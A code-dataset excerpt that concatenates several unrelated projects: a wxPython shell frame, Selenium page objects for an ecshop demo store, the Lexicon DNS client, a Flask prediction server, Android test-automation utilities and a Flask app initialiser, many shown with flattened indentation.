elif id == ID_COPY_PLUS:
event.Enable(win.CanCopy() and hasattr(win, 'CopyWithPrompts'))
elif id == ID_PASTE:
event.Enable(win.CanPaste())
elif id == ID_PASTE_PLUS:
event.Enable(win.CanPaste() and hasattr(win, 'PasteAndRun'))
elif id == ID_CLEAR:
event.Enable(win.CanCut())
elif id == ID_SELECTALL:
event.Enable(hasattr(win, 'SelectAll'))
elif id == ID_EMPTYBUFFER:
event.Enable(hasattr(win, 'ClearAll') and not win.GetReadOnly())
elif id == ID_AUTOCOMP_SHOW:
event.Check(win.autoComplete)
elif id == ID_AUTOCOMP_MAGIC:
event.Check(win.autoCompleteIncludeMagic)
elif id == ID_AUTOCOMP_SINGLE:
event.Check(win.autoCompleteIncludeSingle)
elif id == ID_AUTOCOMP_DOUBLE:
event.Check(win.autoCompleteIncludeDouble)
elif id == ID_CALLTIPS_SHOW:
event.Check(win.autoCallTip)
elif id == ID_CALLTIPS_INSERT:
event.Check(win.callTipInsert)
elif id == ID_WRAP:
event.Check(win.GetWrapMode())
elif id == ID_SHOW_LINENUMBERS:
event.Check(win.lineNumbers)
elif id == ID_ENABLESHELLMODE:
event.Check(self.enableShellMode)
event.Enable(self.config is not None)
elif id == ID_ENABLEAUTOSYMPY:
event.Check(self.enableAutoSympy)
event.Enable(self.config is not None)
elif id == ID_AUTO_SAVESETTINGS:
event.Check(self.autoSaveSettings)
event.Enable(self.config is not None)
elif id == ID_SAVESETTINGS:
event.Enable(self.config is not None and
hasattr(self, 'DoSaveSettings'))
elif id == ID_DELSETTINGSFILE:
event.Enable(self.config is not None)
elif id == ID_EXECSTARTUPSCRIPT:
event.Check(self.execStartupScript)
event.Enable(self.config is not None)
elif id == ID_SHOWPYSLICESTUTORIAL:
event.Check(self.showPySlicesTutorial)
event.Enable(self.config is not None)
elif id == ID_SAVEHISTORY:
event.Check(self.autoSaveHistory)
event.Enable(self.dataDir is not None)
elif id == ID_SAVEHISTORYNOW:
event.Enable(self.dataDir is not None and
hasattr(self, 'SaveHistory'))
elif id == ID_CLEARHISTORY:
event.Enable(self.dataDir is not None)
elif id == ID_EDITSTARTUPSCRIPT:
event.Enable(hasattr(self, 'EditStartupScript'))
event.Enable(self.dataDir is not None)
elif id == ID_FIND:
event.Enable(hasattr(win, 'DoFindNext'))
elif id == ID_FINDNEXT:
event.Enable(hasattr(win, 'DoFindNext'))
elif id == ID_FINDPREVIOUS:
event.Enable(hasattr(win, 'DoFindNext'))
elif id == ID_SHOWTOOLS:
event.Check(self.ToolsShown())
elif id == ID_HIDEFOLDINGMARGIN:
event.Check(self.hideFoldingMargin)
event.Enable(self.config is not None)
else:
event.Enable(False)
except AttributeError:
# This menu option is not supported in the current context.
event.Enable(False)
def OnActivate(self, event):
"""
Event Handler for losing the focus of the Frame. Should close
Autocomplete listbox, if shown.
"""
if not event.GetActive():
# If autocomplete active, cancel it. Otherwise, the
# autocomplete list will stay visible on top of the
# z-order after switching to another application
win = wx.Window.FindFocus()
if hasattr(win, 'AutoCompActive') and win.AutoCompActive():
win.AutoCompCancel()
event.Skip()
def LoadSettings(self, config):
"""Called by derived classes to load settings specific to the Frame"""
pos = wx.Point(config.ReadInt('Window/PosX', -1),
config.ReadInt('Window/PosY', -1))
size = wx.Size(config.ReadInt('Window/Width', -1),
config.ReadInt('Window/Height', -1))
self.SetSize(size)
self.Move(pos)
def SaveSettings(self, config):
"""Called by derived classes to save Frame settings to a wx.Config object"""
# TODO: track position/size so we can save it even if the
# frame is maximized or iconized.
if not self.iconized and not self.IsMaximized():
w, h = self.GetSize()
config.WriteInt('Window/Width', w)
config.WriteInt('Window/Height', h)
px, py = self.GetPosition()
config.WriteInt('Window/PosX', px)
config.WriteInt('Window/PosY', py)
class ShellFrameMixin:
"""
A mix-in class for frames that will have a Shell or a Crust window
and that want to add history, startupScript and other common
functionality.
"""
def __init__(self, config, dataDir):
self.config = config
self.dataDir = dataDir
self.startupScript = os.environ.get('PYTHONSTARTUP')
if not self.startupScript and self.dataDir:
self.startupScript = os.path.join(self.dataDir, 'startup')
self.autoSaveSettings = False
self.autoSaveHistory = False
# We need this one before we have a chance to load the settings...
self.execStartupScript = True
self.showPySlicesTutorial = True
self.enableShellMode = False
self.enableAutoSympy = True
self.hideFoldingMargin = False
if self.config:
self.execStartupScript = \
self.config.ReadBool('Options/ExecStartupScript', True)
self.showPySlicesTutorial = \
self.config.ReadBool('Options/ShowPySlicesTutorial', True)
self.enableShellMode = \
self.config.ReadBool('Options/EnableShellMode', False)
self.enableAutoSympy = \
self.config.ReadBool('Options/EnableAutoSympy', True)
self.hideFoldingMargin = \
self.config.ReadBool('Options/HideFoldingMargin', True)
def OnHelp(self, event):
"""Display a Help window."""
import wx.lib.dialogs
title = 'Help on key bindings'
text = wx.py.shell.HELP_TEXT
dlg = wx.lib.dialogs.ScrolledMessageDialog(self, text, title,
size = ((700, 540)))
fnt = wx.Font(10, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
dlg.GetChildren()[0].SetFont(fnt)
dlg.GetChildren()[0].SetInsertionPoint(0)
dlg.ShowModal()
dlg.Destroy()
def LoadSettings(self):
if self.config is not None:
self.autoSaveSettings = \
self.config.ReadBool('Options/AutoSaveSettings', False)
self.execStartupScript = \
self.config.ReadBool('Options/ExecStartupScript', True)
self.autoSaveHistory = \
self.config.ReadBool('Options/AutoSaveHistory', False)
self.showPySlicesTutorial = \
self.config.ReadBool('Options/ShowPySlicesTutorial', True)
self.enableShellMode = \
self.config.ReadBool('Options/EnableShellMode', False)
self.enableAutoSympy = \
self.config.ReadBool('Options/EnableAutoSympy', True)
self.hideFoldingMargin = \
self.config.ReadBool('Options/HideFoldingMargin', True)
self.LoadHistory()
def SaveSettings(self, force=False):
if self.config is not None:
# always save these
self.config.WriteBool('Options/AutoSaveSettings',
self.autoSaveSettings)
if self.autoSaveSettings or force:
self.config.WriteBool('Options/AutoSaveHistory',
self.autoSaveHistory)
self.config.WriteBool('Options/ExecStartupScript',
self.execStartupScript)
self.config.WriteBool('Options/ShowPySlicesTutorial',
self.showPySlicesTutorial)
self.config.WriteBool('Options/EnableShellMode',
self.enableShellMode)
self.config.WriteBool('Options/EnableAutoSympy',
self.enableAutoSympy)
self.config.WriteBool('Options/HideFoldingMargin',
self.hideFoldingMargin)
if self.autoSaveHistory:
self.SaveHistory()
def SaveHistory(self):
if self.dataDir:
try:
name = os.path.join(self.dataDir, 'history')
f = open(name, 'wb')
hist = []
enc = 'utf-8'
for h in self.shell.history:
h = h.encode(enc)
hist.append(h)
hist = b'\x00\n'.join(hist)
f.write(hist)
f.close()
except:
d = wx.MessageDialog(self, "Error saving history file.",
"Error", wx.ICON_EXCLAMATION|wx.OK)
d.ShowModal()
d.Destroy()
raise
def LoadHistory(self):
if self.dataDir:
name = os.path.join(self.dataDir, 'history')
if os.path.exists(name):
try:
f = open(name, 'rb')
hist = f.read()
f.close()
enc = 'utf-8'
hist = [h.decode(enc) for h in hist.split(b'\x00\n')]
self.shell.history = hist
dispatcher.send(signal="Shell.loadHistory",
history=self.shell.history)
except:
import traceback
traceback.print_exc()
d = wx.MessageDialog(self, "Error loading history file.",
"Error", wx.ICON_EXCLAMATION|wx.OK)
d.ShowModal()
d.Destroy()
def bufferHasChanged(self):
# the shell buffers can always be saved
return True
def bufferSave(self):
import time
appname = wx.GetApp().GetAppName()
default = appname + '-' + time.strftime("%Y%m%d-%H%M.py")
fileName = wx.FileSelector("Save File As", "Saving",
default_filename=default,
default_extension="py",
wildcard="*.py",
flags = wx.SAVE | wx.OVERWRITE_PROMPT)
if not fileName:
return
text = self.shell.GetText()
## This isn't working currently...
## d = wx.MessageDialog(self,u'Save source code only?\n' + \
## 'Answering yes will only save lines starting with >>> and ...',
## u'Question', wx.YES_NO | wx.ICON_QUESTION)
## yes_no = d.ShowModal()
## if yes_no == wx.ID_YES:
## m = re.findall('^[>\.]{3,3} (.*)\r', text, re.MULTILINE | re.LOCALE)
## text = '\n'.join(m)
## d.Destroy()
try:
f = open(fileName, "w")
f.write(text)
f.close()
except:
d = wx.MessageDialog(self, u'Error saving session',u'Error',
wx.OK | wx.ICON_ERROR)
d.ShowModal()
d.Destroy()
def EditStartupScript(self):
if os.path.exists(self.startupScript):
import io
# Use newline=None to translate \n \r \r\n to \n on read. The
# old-style mode='U' is deprecated.
text = io.open(self.startupScript, 'r',
newline=None, encoding='utf-8').read()
else:
text = ''
dlg = EditStartupScriptDialog(self, self.startupScript, text)
if dlg.ShowModal() == wx.ID_OK:
text = dlg.GetText()
try:
f = open(self.startupScript, 'wb')
f.write(text.encode('utf-8'))
f.close()
except:
d = wx.MessageDialog(self, "Error saving startup file.",
"Error", wx.ICON_EXCLAMATION|wx.OK)
d.ShowModal()
d.Destroy()
class EditStartupScriptDialog(wx.Dialog):
def __init__(self, parent, fileName, text):
wx.Dialog.__init__(self, parent, size=(425,350),
title="Edit Startup Script",
style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER)
pst = wx.StaticText(self, -1, "Path:")
ptx = wx.TextCtrl(self, -1, fileName, style=wx.TE_READONLY)
self.editor = editwindow.EditWindow(self)
self.editor.SetText(text)
wx.CallAfter(self.editor.SetFocus)
ok = wx.Button(self, wx.ID_OK)
cancel = wx.Button(self, wx.ID_CANCEL)
mainSizer = wx.BoxSizer(wx.VERTICAL)
pthSizer = wx.BoxSizer(wx.HORIZONTAL)
pthSizer.Add(pst, flag=wx.ALIGN_CENTER_VERTICAL)
pthSizer.Add((5,5))
pthSizer.Add(ptx, 1)
mainSizer.Add(pthSizer, 0, wx.EXPAND|wx.ALL, 10)
mainSizer.Add(self.editor, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 10)
btnSizer = wx.BoxSizer(wx.HORIZONTAL)
btnSizer.Add((5,5), 1)
btnSizer.Add(ok)
btnSizer.Add((5,5), 1)
btnSizer.Add(cancel)
btnSizer.Add((5,5), 1)
mainSizer.Add(btnSizer, 0, wx.EXPAND|wx.ALL, 10)
self.SetSizer(mainSizer)
self.Layout()
def GetText(self):
return self.editor.GetText()
```
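The `Frame`/`ShellFrameMixin` pair above is meant to be combined by a concrete shell frame. A minimal, hedged sketch of that combination follows; it assumes these classes live in the standard `wx.py` frame module and that a plain `wx.py.shell.Shell` is an acceptable `self.shell` — neither assumption comes from the code above.
```python
# Hedged sketch only: assumes the classes above are wx.py's frame module and that
# wx.py.shell.Shell provides the self.shell the mix-in's history helpers expect.
import wx
from wx.py import frame, shell

class DemoShellFrame(frame.Frame, frame.ShellFrameMixin):
    def __init__(self, parent=None):
        frame.Frame.__init__(self, parent, title='Demo Shell')
        frame.ShellFrameMixin.__init__(self, config=None, dataDir=None)
        self.shell = shell.Shell(parent=self)   # used by SaveHistory()/LoadHistory()
        self.LoadSettings()                      # effectively a no-op here since config is None

if __name__ == '__main__':
    app = wx.App(False)
    DemoShellFrame().Show()
    app.MainLoop()
```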
#### File: web_aaaaaaaa/common/fakerdata.py
```python
from faker import Faker
# f=Faker(locale="zh_CN")
#
# print(f.name())  # generate a random user name
# print(f.address())
# print(f.email())
# print(f.phone_number())
# print(f.random_int(min=0,max=999999999))
class RegisterData:
def __init__(self):
self.fk = Faker(locale="zh_CN")
    # def username(self):
    #     """Generate a user name"""
    #     return self.fk.name()
    #
    # def password(self):
    #     """Generate a password"""
    #     return self.fk.password()
    #
    # def email(self):
    #     """Generate an email address"""
    #     return self.fk.email()
    #
    # def phone_number(self):
    #     """Generate a phone number"""
    #     return self.fk.phone_number()
def get_data_for_list(self):
"""将生成的数据集合成列表"""
data = [self.fk.name(),self.fk.password(),self.fk.email(),self.fk.phone_number()]
return data
if __name__ == '__main__':
register = RegisterData()
print(register.get_data_for_list())
```
#### File: web_aaaaaaaa/page/cancel_page.py
```python
from common.base import Base
class Cancel(Base):
    cancel_loc = ('link text', '取消订单')  # "cancel order" link text
def cancel(self):
self.click(self.cancel_loc)
```
#### File: web_aaaaaaaa/page/goods_list_page.py
```python
from common.base import Base
from time import sleep
url = "http://ecshop.itsoso.cn/"
class Goodslist_Page(Base):
"""封装表现层:制作定位器"""
# 首页元素的定位
first_page_loc = ("link text", "首页")
send_loc = ("name", "keywords")
search_loc = ("value", "搜索")
def click_first(self):
"""点击首页"""
self.click(self.first_page_loc)
def get_goods_text(self, locator):
"""获取商品文本"""
goods_elements = self.find_elements(locator)
texts = []
for goods_element in goods_elements:
            text = goods_element.text  # text of a single product
texts.append(text)
return texts
def click_texts(self, locator1,locator2):
"""
        :param locator1: locator for the product-category elements
        :param locator2: locator for the product-list elements
:return:
"""
        # collect the text of every product category
texts = self.get_goods_text(locator1)
for text in texts:
good_loc = ("link text", text)
self.click(good_loc)
self.click_all_element(locator2)
def get_goods_title(self, locator):
"""获取商品标题"""
goods_elements = self.find_elements(locator)
        # collect the product titles
        titles = []  # a list to hold the product titles
for goods_element in goods_elements:
            # "title" here is the value of the element's title attribute
title = goods_element.get_attribute("title")
titles.append(title)
return titles
def click_all_element(self, locator):
"""点击所有元素"""
titles = self.get_goods_title(locator)
for title in titles:
            # rebuild the locator for a single product
goods_loc = ("css selector", f"a[title='{title}']")
self.click(goods_loc)
self.back()
self.next_page()
def next_page(self):
        # locator for the "下一页" (next page) link
        next_loc = ("link text", "下一页")
        # click "next page": if the element exists, click it;
        # otherwise return to the home page
while True:
if self.displayed(next_loc):
self.click(next_loc)
else:
self.click(self.first_page_loc)
break
def input_goods(self,text):
"""输入搜索商品名"""
self.send_keys(self.send_loc,text)
def click_search(self):
"""点击搜索按钮"""
self.click(self.search_loc)
if __name__ == '__main__':
from common.base import open_browser
driver = open_browser()
    goods = Goodslist_Page(driver)  # instantiate the goods list page object
    goods.open_url(url)  # open the site
    goods.click_first()  # click the home-page link
    categary_loc = ("css selector", "div.cat-box>div.cat1>a")  # locator for the product categories
    goods_loc = ("css selector", "div.goods-title>a")  # locator for the product list
    goods.click_texts(categary_loc, goods_loc)  # click through every category and product
```
#### File: web_aaaaaaaa/page/place_order_07.py
```python
from common.base import Base
class SubmitOrder(Base):
    # STO Express shipping
    sto_loc = ('css selector', 'input[value="5"]')
    # post office surface mail
    post_loc = ('css selector', 'input[value="6"]')
    # shipping paid on delivery
    to_pay_loc = ('css selector', 'input[value="7"]')
    # Tiangong cashier
    tien_gong_loc = ('css selector', 'input[value="4"]')
    # Alipay
    alipay_loc = ('css selector', 'input[value="alipay"]')
    # WeChat Pay
    weixin_loc = ('css selector', 'input[value="vxpay"]')
    # account balance
    balance_loc = ('css selector', 'input[value="1"][onclick="selectPayment(this)"]')
    # bank transfer
    bank_loc = ('css selector', 'input[value="2"]')
    # cash on delivery
    reach_loc = ('css selector', 'input[value="3"]')
    # Alipay (payment radio selected by name)
    payment_loc = ('name', 'payment')
    # submit the order
    place_order_loc = ('css selector', 'input[type="image"]')
    def sto(self):
        # select STO Express
        self.click(self.sto_loc)
    def post(self):
        # select surface mail
        self.click(self.post_loc)
    def to_pay(self):
        # select pay-on-delivery shipping
        self.click(self.to_pay_loc)
    def tien_gong(self):
        # select Tiangong cashier
        self.click(self.tien_gong_loc)
    def alipay(self):
        # select Alipay
        self.click(self.alipay_loc)
    def weixin(self):
        # select WeChat Pay
        self.click(self.weixin_loc)
    def balance(self):
        # select balance payment
        self.click(self.balance_loc)
    def bank(self):
        # select bank transfer
        self.click(self.bank_loc)
    def reach(self):
        # select cash on delivery
        self.click(self.reach_loc)
    def payment(self):
        # select Alipay payment
        self.click(self.payment_loc)
    def place_order(self):
        # submit the order
        self.click(self.place_order_loc)
```
#### File: web_aaaaaaaa/page/purchase_page_05.py
```python
from common.base import Base
class Purchase(Base):
    purchase_loc = ('class name', 'td1')  # create the locator
    def purchase(self):
        self.click(self.purchase_loc)  # click "buy now" to add the item to the cart
```
#### File: web_aaaaaaaa/page/shopping_cart04.py
```python
from common.base import Base
from page.good_details3 import Buy_Good,good_url
class ShoppingCart(Base):
    # product name
    good_name_loc = ('class name', 'f6')
    # continue shopping
    keep_shopping_loc = ('css selector', 'img[alt="continue"]')
    # purchase quantity
    buy_num_loc = ('class name', 'inputBg')
    # empty the shopping cart
    clear_car_loc = ('css selector', 'input[type="button"]')
    # update the shopping cart
    refresh_car_loc = ('name', 'submit')
    # delete button
    delete_loc = ('link text', '删除')
    # go to checkout
    pay_loc = ('css selector', 'img[alt="checkout"]')
    # order subtotal
    buy_price_loc = ('css selector', 'td[bgcolor="#ffffff"]')
def click_keep_shopping(self):
self.click(self.keep_shopping_loc)
def click_send_num(self):
self.click(self.buy_num_loc)
    # enter the purchase quantity
def send_buy_num(self,num):
self.click(self.buy_num_loc)
self.send_keys(self.buy_num_loc,num)
    # click "empty the cart"
def click_clear_car(self):
self.click(self.clear_car_loc)
    # click "update the cart"
def update_car(self):
self.click(self.refresh_car_loc)
    # click the delete button
def delete_button(self):
self.click(self.delete_loc)
    # click "go to checkout"
def pay(self):
self.click(self.pay_loc)
    # handle the popup: confirm the deletion
def get_alert_confirm(self):
alert =self.driver.switch_to.alert
alert.accept()
    # handle the popup: cancel
def get_alert(self):
alert =self.driver.switch_to.alert
alert.dismiss()
    # get the product name
def get_name(self,locator):
element = self.find_element(locator)
text = element.text
return text
    # get the product quantity
def get_num(self,locator):
element=self.find_element(locator)
num =element.get_attribute('value')
return num
    # get the subtotal text
def get_price_content(self,locator):
element=self.find_element(locator)
content =element.text
return content
if __name__ == '__main__':
from common.base import open_browser
from time import sleep
driver = open_browser('chrome')
    buy = Buy_Good(driver)  # instantiate Buy_Good
buy.open_url(good_url)
buy.click_libuy()
    shopping = ShoppingCart(driver)  # instantiate ShoppingCart
good_loc=('class name','f6')
print(shopping.get_name(good_loc))
buy_num_loc = ('class name', 'inputBg')
shopping.send_buy_num(3)
shopping.update_car()
num =shopping.get_num(buy_num_loc)
print(num)
buy_price_loc = ('css selector', 'form[name="formCart"]>table:nth-of-type(2)>tbody>tr>td')
content =shopping.get_price_content(buy_price_loc)
print(content)
    # shopping.click_keep_shopping()  # continue shopping
    # shopping.click_clear_car()  # empty the cart
    # shopping.click_send_num()
    # shopping.send_buy_num(3)
    # click "update the cart"
    # shopping.update_car()
    # click delete
    # shopping.delete_button()
    # sleep(2)
    # shopping.get_alert_confirm()
``` |
{
"source": "1500cloud/lexicon",
"score": 2
} |
#### File: lexicon/lexicon/client.py
```python
from __future__ import absolute_import
import importlib
import tldextract
from lexicon import discovery
from lexicon.config import (
ConfigResolver, DictConfigSource,
legacy_config_resolver, non_interactive_config_resolver,
)
class ProviderNotAvailableError(Exception):
"""
Custom exception to raise when a provider is not available,
typically because some optional dependencies are missing
"""
class Client(object): # pylint: disable=useless-object-inheritance,too-few-public-methods
"""This is the Lexicon client, that will execute all the logic."""
def __init__(self, config=None):
if not config:
# If there is not config specified, we load a non-interactive configuration.
self.config = non_interactive_config_resolver()
elif not isinstance(config, ConfigResolver):
# If config is not a ConfigResolver, we are in a legacy situation.
# We protect this part of the Client API.
self.config = legacy_config_resolver(config)
else:
self.config = config
# Validate configuration
self._validate_config()
runtime_config = {}
# Process domain, strip subdomain
domain_parts = tldextract.extract(
self.config.resolve('lexicon:domain'))
runtime_config['domain'] = '{0}.{1}'.format(
domain_parts.domain, domain_parts.suffix)
if self.config.resolve('lexicon:delegated'):
# handle delegated domain
delegated = self.config.resolve('lexicon:delegated').rstrip('.')
if delegated != runtime_config.get('domain'):
# convert to relative name
if delegated.endswith(runtime_config.get('domain')):
delegated = delegated[:-len(runtime_config.get('domain'))]
delegated = delegated.rstrip('.')
# update domain
runtime_config['domain'] = '{0}.{1}'.format(
delegated, runtime_config.get('domain'))
self.action = self.config.resolve('lexicon:action')
self.provider_name = (self.config.resolve('lexicon:provider_name')
or self.config.resolve('lexicon:provider'))
self.config.add_config_source(DictConfigSource(runtime_config), 0)
provider_module = importlib.import_module(
'lexicon.providers.' + self.provider_name)
provider_class = getattr(provider_module, 'Provider')
self.provider = provider_class(self.config)
def execute(self):
"""Execute provided configuration in class constructor to the DNS records"""
self.provider.authenticate()
identifier = self.config.resolve('lexicon:identifier')
record_type = self.config.resolve('lexicon:type')
name = self.config.resolve('lexicon:name')
content = self.config.resolve('lexicon:content')
if self.action == 'create':
return self.provider.create_record(record_type, name, content)
if self.action == 'list':
return self.provider.list_records(record_type, name, content)
if self.action == 'update':
return self.provider.update_record(identifier, record_type, name, content)
if self.action == 'delete':
return self.provider.delete_record(identifier, record_type, name, content)
raise ValueError('Invalid action statement: {0}'.format(self.action))
def _validate_config(self):
provider_name = self.config.resolve('lexicon:provider_name')
        if not provider_name:
            raise AttributeError('provider_name')
        try:
            available = discovery.find_providers()[provider_name]
except KeyError:
raise ProviderNotAvailableError('This provider ({0}) is not supported by Lexicon.'
.format(provider_name))
else:
if not available:
raise ProviderNotAvailableError(
'This provider ({0}) has required dependencies that are missing. '
'Please install lexicon[{0}] first.'.format(provider_name))
if not self.config.resolve('lexicon:action'):
raise AttributeError('action')
if not self.config.resolve('lexicon:domain'):
raise AttributeError('domain')
if not self.config.resolve('lexicon:type'):
raise AttributeError('type')
``` |
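A hedged usage sketch for the `Client` above. Passing a plain dict exercises the legacy-config branch in `__init__`; the dict keys, provider name, and domain below are illustrative assumptions, not values taken from this file.
```python
# Hypothetical driver for lexicon.client.Client; the dict keys and provider are assumptions.
from lexicon.client import Client

action_config = {
    'provider_name': 'cloudflare',   # assumed provider; must be importable under lexicon.providers
    'action': 'list',                # create / list / update / delete, as dispatched in execute()
    'domain': 'example.com',
    'type': 'TXT',
}

client = Client(action_config)       # a non-ConfigResolver config goes through legacy_config_resolver()
print(client.execute())              # authenticates the provider, then runs the requested action
```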
{
"source": "15014370uhi/flask_api",
"score": 3
} |
#### File: 15014370uhi/flask_api/flask_server.py
```python
from flask import Flask, request
from flask_cors import CORS
import json
import os
from myLogisticRegression import getPredictions
app = Flask(__name__)
CORS(app)
@app.route("/")
def index():
return "Welcome to safe streets machine learning flask server"
@app.route("/predict", methods=["POST"])
def runPredictionModel():
data = request.get_json(silent=True)
month = data.get("month")
year = data.get("year")
lat = data.get("lat")
lon = data.get("lon")
sector = data.get("sector")
# call machine learning function with data
result = getPredictions(month, year, lat, lon, sector)
results_JSON = json.dumps(result)
# print("results_JSON: ", results_JSON)
return results_JSON
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=False, port=os.environ.get('PORT', 80))
#app.run(port=5000)
``` |
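For reference, a small client-side sketch of exercising the `/predict` route above. The field names match what `runPredictionModel` reads from the JSON body; the host, port, and sample values are assumptions.
```python
# Hypothetical client for the /predict endpoint above; host, port and values are placeholders.
import requests

payload = {
    "month": 6,
    "year": 2021,
    "lat": 51.5074,
    "lon": -0.1278,
    "sector": "example-sector",
}
resp = requests.post("http://localhost:80/predict", json=payload)
print(resp.json())   # the view returns json.dumps(result), so this is the prediction payload
```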
{
"source": "15045120/AndroidTest",
"score": 2
} |
#### File: AndroidTest/androidautotest/tool.py
```python
import os
import time
import traceback
import random
import sys
import json
import webbrowser
import subprocess
import urllib.request
import platform
import zipfile
import shutil
# dirname:get parent directory
# sys.argv[0] getFileName
CASE_PATH = os.path.abspath(os.path.dirname(sys.argv[0]))
PATHSEP = os.sep
LINESEQ = os.linesep
PLATFORM = platform.system()
USER_HOME = os.path.expanduser('~')
def line_join(*str):
str_all = ''
for i in range(len(str)):
str_all = str_all + str[i]
str_all = str_all + LINESEQ
return str_all
def confidence_precent(value):
return str(round(float(value)*100, 2))+'%'
def random_id():
time_log = time.strftime("[%Y-%m-%d %H:%M:%S] ", time.localtime())
time_str = time.strftime("%Y%m%d%H%M%S", time.localtime())
random_str = ''.join(random.sample(['0','1','2','3','4','5','6','7','8','9'], 6))
return time_log, time_str, random_str
def open_new_tab(path):
webbrowser.open_new_tab(path)
def set_adb_home():
ADB_HOME = Path.path_join(USER_HOME, '.androidautotest', 'platform-tools')
if PLATFORM == 'Windows':
Command.write('set path=%path%;{}'.format(ADB_HOME))
elif PLATFORM == 'Linux':
Command.write('export PATH={}:$PATH'.format(ADB_HOME))
class Path:
@staticmethod
def exists(path):
return os.path.exists(path)
@staticmethod
def isfile(path):
return os.path.isfile(path)
@staticmethod
def listdir(path):
return os.listdir(path)
@staticmethod
def isdir(path):
return os.path.isdir(path)
@staticmethod
def remove(path):
if os.path.exists(path):
os.remove(path)
@staticmethod
def makedirs(path):
if not os.path.exists(path):
os.makedirs(path)
@staticmethod
def parent(path, isurl=False):
if isurl:
return path[0:path.rfind('/')]
else:
return path[0:path.rfind(PATHSEP)]
@staticmethod
def name(path, end=0, isurl=False):
tmp = ''
if isurl:
tmp = path[path.rfind('/')+1:len(path)]
else:
tmp = path[path.rfind(PATHSEP)+1:len(path)]
if end > 0:
return tmp[0:end]
elif end < 0:
return tmp[0:len(tmp)+end]
else:
return tmp
@staticmethod
def copy(source, dest):
shutil.copy(source, dest)
@staticmethod
def path_join(*path):
path_all = ''
for i in range(len(path)-1):
path_all = path_all + path[i] + PATHSEP
path_all = path_all + path[-1]
return path_all
class Command:
@staticmethod
def write(command):
return os.system(command)
@staticmethod
def read(command):
r = os.popen(command)
# Physical size: 1080x1920
lines = r.readlines()
lines_no_lineseq = []
for line in lines:
line_no_lineseq = line.strip(LINESEQ)
if line_no_lineseq != '':
lines_no_lineseq.append(line.strip(LINESEQ))
return lines_no_lineseq
@staticmethod
def exit(status=0):
return sys.exit(status)
@staticmethod
def argv(position):
return sys.argv[position]
@staticmethod
def traceback():
return traceback.format_exc()
class Json:
@staticmethod
def dumps(obj):
return json.dumps(obj)
@staticmethod
def loads(str):
return json.loads(str, encoding="utf-8", strict=False)
class Timer:
@staticmethod
def time():
return time.time()
@staticmethod
def sleep(sec):
return time.sleep(sec)
@staticmethod
def strftime(format, time_value):
return time.strftime(format, time.localtime(time_value))
@staticmethod
def calc(sec):
sec = int(sec)
second = 0
minute = 0
hour = 0
if sec > 3600:
hour = int(sec/3600)
minute = int((sec - hour*3600)/60)
second = sec - hour*3600 - minute*60
elif sec > 60:
hour = 0
minute = int(sec/60)
second = sec - hour*3600 - minute*60
else:
hour = 0
minute = 0
second = sec
return hour, minute, second
class Downloader:
__start_time = -1
def download(self, http_url, dependency_dir):
print(' Downloading %s ... ' % http_url)
local_dir = Path.path_join(dependency_dir, Path.name(http_url, isurl=True))
self.__start_time = time.time()
urllib.request.urlretrieve(http_url, local_dir, self.__report_hook)
print()
# unzip file if file ends with 'zip'
if Path.name(http_url, isurl=True).endswith('zip'):
Ziper.unzip(local_dir, Path.parent(local_dir))
def __report_hook(self, block_number, read_size, total_size):
precent = int((100.0*block_number*read_size)/total_size)
percent_str = '{}%'.format(precent)
size, unit = self.__calc_byte(total_size)
total_str = str(size) + unit
size, unit = self.__calc_byte((block_number*read_size)/(time.time()-self.__start_time))
time_left_str = '0:00:00'
speed = (block_number*read_size)/(time.time()-self.__start_time)
speed_str = '0kB/s'
if speed != 0:
speed_str = str(size) + unit +'/s'
hour, minute, second = Timer.calc((total_size-block_number*read_size)/speed)
time_left_str = str(hour).zfill(1) +':'+ str(minute).zfill(2) +':'+ str(second).zfill(2)
if block_number*read_size < total_size:
current_size_str = str(block_number*read_size) + '/' + str(total_size)
else:
current_size_str = str(total_size) + '/' + str(total_size)
# \r to flush
sys.stdout.write('\r %s |%s%s| %s %s [%s %s]' % (percent_str, '█' * int(precent/5), ' ' * int((100-precent)/5), total_str, current_size_str, time_left_str, speed_str))
sys.stdout.flush()
time.sleep(0.005)
def __calc_byte(self, byte_size):
size = 0
unit = 'B'
if byte_size < 102.4:#20B
size = round(byte_size)
unit = 'B'
elif (byte_size/1024) < 1024:#
size = round(byte_size/1024, 1)
if size > 1:
size = round(size)
unit = 'kB'
else:
size = round(((byte_size/1024)/1024), 1)
unit = 'MB'
return size, unit
class Ziper:
@staticmethod
def unzip(zip_path, output_path):
print('Unziping %s ... ' % zip_path)
zip_file = zipfile.ZipFile(zip_path)
for names in zip_file.namelist():
print('Extracting %s ...' % names)
if not Path.exists(Path.path_join(output_path, names)):
zip_file.extract(names, output_path)
zip_file.close()
Path.remove(zip_path)
``` |
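A hedged sketch of how a test script might lean on the helpers above; the download URL and output directory are placeholders, and the `androidautotest.tool` import path is assumed from the file location.
```python
# Illustrative use of the helpers above; the URL, directory and adb availability are assumptions.
from androidautotest.tool import Path, Timer, Command, Downloader, set_adb_home

set_adb_home()                                      # put the bundled platform-tools on PATH
out_dir = Path.path_join('.', 'downloads')          # placeholder output directory
Path.makedirs(out_dir)
start = Timer.time()
Downloader().download('https://example.com/tools.zip', out_dir)  # .zip archives are auto-extracted
hour, minute, second = Timer.calc(Timer.time() - start)
print('download took {}:{:02d}:{:02d}'.format(hour, minute, second))
for line in Command.read('adb devices'):            # read() returns the non-empty output lines
    print(line)
```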
{
"source": "150619/HMTopNews",
"score": 2
} |
#### File: HMTopNews/app/__init__.py
```python
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
# SQLAlchemy object for the MySQL database
db = SQLAlchemy()
# Redis client object
redis_client = None
# register extension components
def register_extensions(app: Flask):
    # bind SQLAlchemy to the Flask application
    db.init_app(app)
    # create the Redis client with decode_responses=True
    global redis_client
    from redis import StrictRedis
    redis_client = StrictRedis(host=app.config['REDIS_HOST'], port=app.config['REDIS_PORT'], decode_responses=True)
    # register URL converters
    from common.utils.converters import register_converters
    register_converters(app)
    # database migrations
    from flask_migrate import Migrate
    Migrate(app, db)
    from common.models import user, article
    # add request hooks
    from common.utils.middlewares import get_user_info
    app.before_request(get_user_info)
# register blueprint components
def register_bp(app: Flask):
from app.resource.user import user_bp
app.register_blueprint(user_bp)
from app.resource.channel import channel_bp
app.register_blueprint(channel_bp)
from app.resource.article import article_bp
app.register_blueprint(article_bp)
